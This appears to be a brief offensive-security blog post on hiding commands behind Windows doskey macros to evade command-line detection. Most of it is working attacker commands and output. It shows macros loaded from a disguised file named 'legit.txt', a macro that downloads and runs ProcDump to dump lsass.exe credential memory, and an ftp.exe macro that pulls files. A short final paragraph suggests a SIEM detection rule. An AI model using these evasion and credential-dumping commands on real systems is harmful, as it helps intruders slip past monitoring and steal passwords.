Evading command-line detection with doskey

doskey

the doskey command can be used to evade some command-line detection rules by hidding the executable name behind an alias.

You can define and use a macro as such:

C:\Users\Target> doskey test1="%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" $*
C:\Users\Target> test1 gci c:\


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        01/10/2022     14:37                Intel
d-----        07/05/2022     07:24                PerfLogs
d-r---        09/10/2022     09:14                Program Files
d-r---        03/10/2022     09:33                Program Files (x86)
d-r---        01/10/2022     14:13                Users
d-----        13/10/2022     08:36                Windows

Clearly, any good detection rule will still catch the “powershell.exe” during macro definition but you can import macros from a file so that it will not appear on the command-line.

Define and save the macros to a file:

C:\Users\Attacker> doskey test1="%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" $*
C:\Users\Attacker> doskey /m > legit.txt

Transfer the file to the target and load it:

C:\Users\Target> doskey /macrofile=legit.txt
C:\Users\Target> test1 cgi c:\


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        01/10/2022     14:37                Intel
d-----        07/05/2022     07:24                PerfLogs
d-r---        09/10/2022     09:14                Program Files
d-r---        03/10/2022     09:33                Program Files (x86)
d-r---        01/10/2022     14:13                Users
d-----        13/10/2022     08:36                Windows

Another example (needs admin rights):

C:\Users\Attacker> doskey test2=powershell (New-Object System.Net.Webclient).DownloadFile('https://download.sysinternals.com/files/Procdump.zip', 'test.zip'); Expand-Archive test.zip -DestinationPath test -Force; test/procdump.exe -accepteula -ma lsass.exe lsass.dmp
C:\Users\Attacker> doskey /m > legit.txt

On target:

C:\Windows\System32> doskey /macrofile=legit.txt
C:\Windows\System32> test2

ProcDump v10.11 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[11:03:53] Dump 1 initiated: C:\Windows\System32\lsass.dmp
[11:03:54] Dump 1 writing: Estimated dump file size is 65 MB.
[11:03:54] Dump 1 complete: 65 MB written in 1.0 seconds
[11:03:55] Dump count reached.

You can also chain commands in macro definition with $t:

doskey tx=cd temp$tdir /w $*

And change the default executable (cmd.exe) used for resolving macros:

doskey /exename=ftp.exe go=open 172.27.1.100$tmget *.TXT c:\reports$tbye

Detection

This will not work on detection hooks that are at a lower level than command-line history though and you will left an artifact containing the aliases definition.

I do not know to which extent “doskey” is still used on Windows systems as of today. I would suggest checking the occurences of execution of that binary on a SIEM for example and if not frequently used, create a detection rule on its execution.